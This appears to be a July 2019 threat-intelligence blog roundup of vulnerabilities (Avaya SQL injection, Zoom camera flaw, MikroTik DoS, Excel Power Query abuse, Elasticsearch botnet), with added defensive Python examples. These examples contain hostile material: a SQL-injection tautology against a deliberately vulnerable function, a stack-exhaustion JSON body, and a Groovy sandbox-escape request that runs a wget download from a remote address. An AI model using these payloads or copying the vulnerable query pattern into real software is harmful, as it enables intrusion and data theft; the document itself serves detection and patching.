This blog series aims to provide a regular overview of trends in vulnerability disclosures and announcements. Where applicable, it covers known exploits for trending vulnerabilities and the relevant courses of action. The report is not exhaustive and will not include every vulnerability announced in a given month.
Key Findings
- A recently announced Windows zero-day, CVE-2019-1132, was exploited to target entities in Eastern Europe.
- The Mac Zoom client was found to be vulnerable to multiple issues, including one that lets a malicious website turn on the user's camera.
- Various activity around the widely exploited Microsoft Office vulnerability CVE-2017-11882 was observed throughout July 2019.
Analysis
Newly Discovered Vulnerabilities
Databases
A SQL injection vulnerability CVE-2019-7003 in the reporting component of Avaya Control Manager could allow an unauthenticated attacker to execute arbitrary SQL commands and retrieve sensitive data related to other users on the system.
Affected versions of Avaya Control Manager include 7.x and 8.0.x versions prior to 8.0.4.0. Unsupported versions not listed here were not evaluated.
Course of Action:
- Upgrade to version 8.0.4.0
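The bug class behind CVE-2019-7003, shown as an added example rather than Avaya's code: the users table, the report function and its user_id parameter are constructed stand-ins. The vulnerable version pastes an untrusted report parameter straight into the statement, which is how one crafted value returns every user's record; the hardened version enforces the expected type and binds the value as a parameter.

```python
"""Added example of the SQL injection bug class behind CVE-2019-7003.
Constructed stand-in: the schema, the report function and its `user_id`
parameter are assumptions, not Avaya Control Manager code."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: the table a reporting endpoint queries."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT, phone TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "alice", "alice@example.invalid", "+1-555-0100"),
            (2, "bob", "bob@example.invalid", "+1-555-0101"),
            (3, "carol", "carol@example.invalid", "+1-555-0102"),
        ],
    )
    return con


def report_vulnerable(con: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable pattern: the value taken from the request is concatenated
    straight into the statement, so the attacker controls the WHERE clause."""
    sql = f"SELECT name, email, phone FROM users WHERE id = {user_id}"
    return con.execute(sql).fetchall()


def report_parameterized(con: sqlite3.Connection, user_id: str) -> list:
    """Hardened pattern: enforce the expected type, then bind the value so the
    database engine never interprets it as SQL."""
    uid = int(user_id)  # raises ValueError for anything that is not an integer
    sql = "SELECT name, email, phone FROM users WHERE id = ?"
    return con.execute(sql, (uid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Intended use: one record for the requested user.
    print(report_vulnerable(db, "1"))
    # Injected value: the tautology widens the query to every user's record,
    # which is the "sensitive data related to other users" impact.
    print(report_vulnerable(db, "1 OR 1=1"))
    # The same input against the hardened function is rejected before any SQL runs.
    try:
        report_parameterized(db, "1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The type check is what makes the parameterized version safe here; for free-text parameters the binding alone still prevents injection, but the input should also be length-limited and validated against the format the report actually expects.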
Operating Systems
A security flaw in Iomega and LenovoEMC network attached storage (NAS) appliances, CVE-2019-6160, could allow an unauthenticated user to access files stored on the device via its API.
Researchers found 5,114 exposed devices storing over 3 million files, including card numbers and financial records.
Course of Action:
- Update Lenovo Firmware for Systems Impacted by CVE-2019-6160
Security researchers found that media files received by Telegram and WhatsApp on Android can be read and manipulated by other apps on the device (a "media file jacking" attack). WhatsApp for Android is affected by default; Telegram for Android is affected if the "Save to gallery" feature is enabled.
The flaw arises because the apps write received media to external storage, where the files can be viewed and modified not only by the user but by any other app holding the external storage permission, before the user ever opens them.
Over a million apps in Google Play hold the write-to-external-storage permission and therefore have this access.
Course of Action:
- Stop the apps from saving received media to external storage: turn off the media visibility setting in WhatsApp and disable "Save to gallery" in Telegram.
In June 2019, ESET researchers identified a zero-day exploit being used in a highly targeted attack in Eastern Europe.
The exploit is a privilege escalation vulnerability CVE-2019-1132 in Microsoft Windows. The elevation of privilege vulnerability happens in Windows when the Win32k component fails to properly handle objects in memory. To exploit this vulnerability, an attacker would first have to log on to the system.
The vulnerability affects some versions of Windows 7 and Windows Server 2008.
Course of Action:
- Apply the July 2019 Microsoft security update (CVE-2019-1132 was fixed on 9 July 2019)
Researchers identified a vulnerability in the Mac Zoom client that allows any malicious website to enable a user's camera without permission.
CVE-2019-13450 allows any website to force a user to join a Zoom call with their video camera activated.
CVE-2019-13449 allows any web page to cause a denial of service (DoS) on a Mac by repeatedly joining the user to an invalid call.
Both issues leverage the Zoom feature whereby a meeting link, opened in the browser, launches the Zoom client on the local machine. On macOS the client achieves this by installing a local web server that the browser can reach without a prompt, and that web server survives uninstalling the client. The issues also affect another conferencing service, RingCentral; according to the researcher who discovered them, RingCentral's web conferencing product is a "white labeled Zoom system".
Course of Action:
- Apply the Zoom emergency update, which removes the local web server
Routers
MikroTik RouterOS before 6.44.5 (long-term release tree) is vulnerable to memory exhaustion (CVE-2019-13954). By sending a crafted HTTP request, an authenticated remote attacker can crash the HTTP server and in some circumstances reboot the system. Malicious code cannot be injected.
MikroTik RouterOS before 6.44.5 (long-term release tree) is vulnerable to stack exhaustion (CVE-2019-13955). By sending a crafted HTTP request, an authenticated remote attacker can crash the HTTP server through recursive parsing of JSON. Malicious code cannot be injected.
A vulnerability in the FTP daemon on MikroTik routers through 6.44.3 (CVE-2019-13074) could allow remote attackers to exhaust all available memory, causing the device to reboot, because of uncontrolled resource management.
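The stack-exhaustion bug class behind CVE-2019-13955, as an added example that is not RouterOS code: Python's recursive json module stands in for the router's HTTP server parser. The unbounded parser descends one call level per bracket, so a body of nested arrays exhausts its stack; the hardened parser bounds body size and nesting depth with a non-recursive pre-scan before the recursive parser ever runs. The payload and the limits are constructed.

```python
"""Added example of the bug class behind CVE-2019-13955: a recursive JSON
parser whose call depth is controlled by the request body.  Constructed
stand-in using Python's json module in place of the RouterOS HTTP server."""
import json

# Constructed payload: 100,000 nested arrays in a 200 KB body.
DEEP_BODY = "[" * 100_000 + "]" * 100_000


def parse_unbounded(body: str):
    """Vulnerable pattern: parse whatever arrives.  json.loads descends one
    level per bracket, so this body exhausts the parser's stack (Python
    surfaces that as RecursionError; a native parser would simply crash)."""
    return json.loads(body)


def nesting_depth(body: str) -> int:
    """Maximum bracket/brace nesting depth, computed with a linear scan rather
    than recursion so the check itself cannot be exhausted.  Brackets inside
    JSON strings are skipped, escapes included."""
    depth = max_depth = 0
    in_string = escaped = False
    for ch in body:
        if in_string:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
        elif ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch in "]}":
            depth -= 1
    return max_depth


def parse_bounded(body: str, max_depth: int = 32, max_bytes: int = 256 * 1024):
    """Hardened pattern: bound size and nesting before the recursive parser
    runs.  The limits are assumptions; derive them from the API's real needs."""
    if len(body) > max_bytes:
        raise ValueError(f"body of {len(body)} bytes exceeds {max_bytes}")
    depth = nesting_depth(body)
    if depth > max_depth:
        raise ValueError(f"nesting depth {depth} exceeds {max_depth}")
    return json.loads(body)


if __name__ == "__main__":
    try:
        parse_unbounded(DEEP_BODY)
    except RecursionError:
        print("unbounded parser: stack exhausted")
    try:
        parse_bounded(DEEP_BODY)
    except ValueError as exc:
        print("bounded parser rejected request:", exc)
    print(parse_bounded('{"name": "ether1", "tags": ["wan", "{not a bracket}"]}'))
```

The size limit alone is not enough: a 200 KB body is well within what an API might accept, yet it carries 100,000 levels of nesting. The depth scan is linear in the body length, so the check costs less than the parse it protects.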
Other
A race condition (CVE-2019-7614) was found in how Elasticsearch versions before 7.2.1 and 6.8.2 handle the response headers returned for a request. On a system with multiple users submitting requests concurrently, an attacker could receive a response header containing sensitive data belonging to another user.
A local elevation of privilege vulnerability CVE-2019-0880 exists in how splwow64.exe handles certain calls. An attacker who successfully exploited the vulnerability could elevate privileges on an affected system from low-integrity to medium-integrity.
This vulnerability by itself does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability (such as a remote code execution vulnerability or another elevation of privilege vulnerability) that is capable of leveraging the elevated privileges when code execution is attempted.
Course of Action:
- Apply the July 2019 Microsoft security update (CVE-2019-0880 was fixed on 9 July 2019)
Threat actors are abusing a Microsoft Excel feature called Power Query to execute malicious code on a targeted machine. The technique uses crafted Excel documents that reference data on an attacker-controlled remote server via Power Query; the fetched content can in turn launch code through the MS Excel Dynamic Data Exchange (DDE) protocol.
The technique bypasses security appliances that analyse documents sent via email, because the malicious content is only retrieved when the document is opened. It relies on the victim initiating the Power Query data load.
Power Query is available for Microsoft Excel 2010 and later.
Course of Action:
- Microsoft advisory KB4053440 (on securely opening Office documents that contain DDE fields) addresses the issue.
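A triage check for the delivery mechanism described above, as an added example (not Microsoft's or any vendor's code). It opens a workbook as the OOXML zip package it is and reports the external-data indicators a practitioner would want to see before a document reaches a user: legacy web queries (webPr url), Power Query connections (the Microsoft.Mashup.OleDb.1 provider in xl/connections.xml), connections set to refresh on open, and the presence of an embedded DataMashup part. The sample workbook is constructed in memory with only the parts the scanner reads; the query definition inside DataMashup is stored compressed and is not decoded here.

```python
"""Added example: scan an .xlsx package for external data connections of the
kind a Power Query delivery abuses.  The sample workbook built below is a
constructed minimal package, not a real Excel file or anyone's malware."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

SML = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
URL_RE = re.compile(r"https?://[^\s;\"'<>]+")

# Constructed connections part: one Power Query (Mashup) connection that
# refreshes on open and one legacy web query pointing at a remote host
# (203.0.113.10 is a documentation address).
PQ_CONNECTIONS = """<?xml version="1.0" encoding="UTF-8"?>
<connections xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <connection id="1" name="Query - Invoice" refreshOnLoad="1">
    <dbPr connection="Provider=Microsoft.Mashup.OleDb.1;Data Source=$Workbook$;Location=Invoice;"
          command="SELECT * FROM [Invoice]"/>
  </connection>
  <connection id="2" name="Legacy web query">
    <webPr url="http://203.0.113.10/feed.html" htmlTables="1"/>
  </connection>
</connections>"""
EMPTY_CONNECTIONS = ('<connections xmlns="http://schemas.openxmlformats.org/'
                     'spreadsheetml/2006/main"/>')


def build_sample_xlsx(connections_xml: str, with_mashup: bool) -> bytes:
    """Constructed minimal OOXML package containing only the parts scanned."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/connections.xml", connections_xml)
        if with_mashup:
            z.writestr("customXml/item1.xml",
                       '<DataMashup xmlns="http://schemas.microsoft.com/DataMashup">'
                       "AAAAAA==</DataMashup>")
    return buf.getvalue()


def scan_xlsx(package: bytes) -> list:
    """Return one finding per external-data indicator in the workbook."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as z:
        names = z.namelist()
        if "xl/connections.xml" in names:
            root = ET.fromstring(z.read("xl/connections.xml"))
            for conn in root.iter(SML + "connection"):
                name = conn.get("name", "<unnamed>")
                if conn.get("refreshOnLoad") == "1":
                    findings.append(f"{name}: refreshes automatically when the workbook opens")
                for prop in conn:  # dbPr, webPr, textPr, ...
                    url = prop.get("url")
                    if url:
                        findings.append(f"{name}: web query to {url}")
                    conn_str = prop.get("connection", "")
                    if "Microsoft.Mashup" in conn_str:
                        findings.append(f"{name}: Power Query (Mashup) connection")
                    for u in URL_RE.findall(conn_str + " " + prop.get("command", "")):
                        findings.append(f"{name}: connection string references {u}")
        for n in names:
            if n.startswith("customXml/") and b"DataMashup" in z.read(n):
                findings.append(f"{n}: embedded Power Query definition (DataMashup)")
    return findings


if __name__ == "__main__":
    for line in scan_xlsx(build_sample_xlsx(PQ_CONNECTIONS, with_mashup=True)):
        print(line)
```

The refreshOnLoad flag deserves its own finding: the technique as described depends on the victim triggering the data load, and a connection marked to refresh on open removes that step.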
Ongoing Exploitation of Vulnerabilities
July 2019 saw the continued exploitation of the popular Microsoft Office vulnerability CVE-2017-11882.
As previously observed, the vulnerability is being used to target financial institutions through email attacks. What is distinctive in this attack chain is that the emails leverage CVE-2017-11882 to install the "Heaven's Gate" loader, whose purpose is to deliver commodity malware. The loader is capable of downloading a variety of commodity malware, including Remcos, Agent Tesla, HawkEye, and various cryptominers.
EclecticIQ analysts also reported (Multiple Chinese Groups Share the Same RTF Weaponizer) on an RTF weaponizer used by multiple Chinese actors; one of the exploits it weaponizes is CVE-2017-11882.
The attack pattern, MS Word attachments weaponized with exploits, explains the high number of attacks and lends credence to the confidence threat actors have in the successful exploitation of the vulnerability.
In a report (Silence Group Likely Behind Recent $3M Bangladesh Bank Heist), the initial attack vector most likely included the exploitation of common vulnerabilities delivered by spearphishing. The vulnerabilities previously used by the intrusion set likely behind the theft, Silence, include CVE-2017-0199, CVE-2017-11882, CVE-2018-0802, CVE-2017-0262, and CVE-2018-8174.
This vulnerability is only as prolific as it is because of outdated software. Microsoft patched CVE-2017-11882 in November 2017 and has since removed the vulnerable Equation Editor component from Office altogether, so a fully updated installation is not exposed. As long as basic infrastructure upgrades, like that of Microsoft Office, are backlogged or ignored, the exploitation of CVE-2017-11882 will continue.
Trend Micro researchers have identified a new campaign targeting Elasticsearch servers to turn them into DDoS botnet zombies.
As part of the attack chain, threat actors scan for servers running vulnerable Elasticsearch versions (1.3.0 – 1.3.7 and 1.4.0 – 1.4.2) and then exploit CVE-2015-1427, a sandbox bypass in the Groovy scripting engine, with a request containing a malicious URL. The request downloads a dropper that ultimately installs the Setag backdoor, which bears the hallmarks of the BillGates malware, first encountered in 2014 and known for hijacking systems to launch DDoS attacks. Of late, variants of the BillGates malware have been observed in botnet-related activity.
Course of Action:
- Upgrade to Elasticsearch 1.3.8 or 1.4.3 or later; where that is not possible, disable the Groovy sandbox by setting script.groovy.sandbox.enabled to false in elasticsearch.yml and restart the node.
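Two checks for the Elasticsearch campaign above, as an added example that is not Trend Micro's or Elastic's code: a version test against the ranges the page lists for CVE-2015-1427, and a detector for search requests whose inline Groovy script reaches out of the sandbox (reflective class loading, Runtime, process execution). Elasticsearch does not log request bodies by default, so the bodies would come from a reverse proxy log or a packet capture; the two bodies here are constructed, the first modelled on the published exploit pattern.

```python
"""Added example for the Elasticsearch campaign above: (1) decide whether a
reported version string falls in the ranges listed as vulnerable to
CVE-2015-1427, and (2) flag search requests whose inline Groovy script
reaches out of the sandbox.  The request samples are constructed, modelled
on the public exploit pattern; they are not captures from the campaign."""
import re

# Inclusive ranges from the text: 1.3.0 - 1.3.7 and 1.4.0 - 1.4.2.
VULNERABLE_RANGES = [((1, 3, 0), (1, 3, 7)), ((1, 4, 0), (1, 4, 2))]

# Groovy constructs that escape the scripting sandbox; none belong in a
# legitimate script_fields or scoring script.
SANDBOX_ESCAPES = [
    r"\.class\.forName\s*\(",          # reflective class loading
    r"java\.lang\.Runtime",            # direct Runtime reference
    r"getRuntime\s*\(\s*\)\s*\.exec",  # process execution
    r"ProcessBuilder",
]


def parse_version(version: str) -> tuple:
    """'1.4.2' -> (1, 4, 2); tolerates a qualifier such as '1.4.2-SNAPSHOT'."""
    core = version.split("-")[0]
    return tuple(int(p) for p in core.split(".")[:3])


def is_vulnerable_version(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in VULNERABLE_RANGES)


def sandbox_escape_hits(request_body: str) -> list:
    """Patterns from SANDBOX_ESCAPES found in a request body."""
    return [p for p in SANDBOX_ESCAPES if re.search(p, request_body)]


def triage(version: str, request_body: str) -> str:
    """Combine the two signals into one verdict for an alert queue."""
    if not sandbox_escape_hits(request_body):
        return "benign"
    if is_vulnerable_version(version):
        return "exploit attempt against vulnerable version"
    return "exploit attempt, version not vulnerable"


# Constructed request bodies.  The first mirrors the published CVE-2015-1427
# pattern: a script_fields script that loads Runtime by reflection and runs
# a download command (198.51.100.7 is a documentation address).
EXPLOIT_BODY = (
    '{"size":1,"script_fields":{"x":{"lang":"groovy","script":'
    '"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime()'
    '.exec(\\"wget http://198.51.100.7/dropper\\").getText()"}}}'
)
BENIGN_BODY = (
    '{"query":{"match_all":{}},"script_fields":{"total":'
    '{"lang":"groovy","script":"doc[\\"qty\\"].value * 2"}}}'
)

if __name__ == "__main__":
    print(triage("1.4.2", EXPLOIT_BODY))
    print(triage("1.4.3", EXPLOIT_BODY))
    print(triage("1.4.2", BENIGN_BODY))
```

An attempt against a patched node is still worth an alert: it shows the server is being actively scanned, and the same actor will typically retry with whatever else the version exposes.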
Patched Vulnerabilities
Google patched a total of 33 security vulnerabilities in various components of Android in July 2019.
The most severe flaws affect the Android Media framework and the Android system; they could be exploited by a remote attacker to execute arbitrary code within the context of a privileged process.
The flaws within the Android Media framework, CVE-2019-2106, CVE-2019-2107 and CVE-2019-2109, could allow a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.
These issues affect devices running Android 7.0 or later, with the exception of Android 9.0. The fourth critical flaw, CVE-2019-2111, is a remote code execution vulnerability in the Android system that could be exploited for arbitrary code execution within the context of a privileged user; it affects only Android 9.0 devices.
There is no evidence any of the flaws have ever been exploited in the wild.
Course of Action:
- Apply July 2019 Android Update
Recommendations
EclecticIQ Fusion Center recommends that customers apply security updates to their systems as soon as they become available, in order to mitigate the risks posed by the vulnerabilities mentioned in this report. Note that this report summarises the main vulnerabilities we have seen over the course of a month and so does not reflect the full list of CVEs published by vendors.
Users should ensure they update their own systems and dependencies even where these are not mentioned in this report.
We hope you enjoyed this post. Subscribe to our blog for more interesting reads on Cyber Threat Intelligence or check out our resource section for whitepapers, threat analysis reports and more.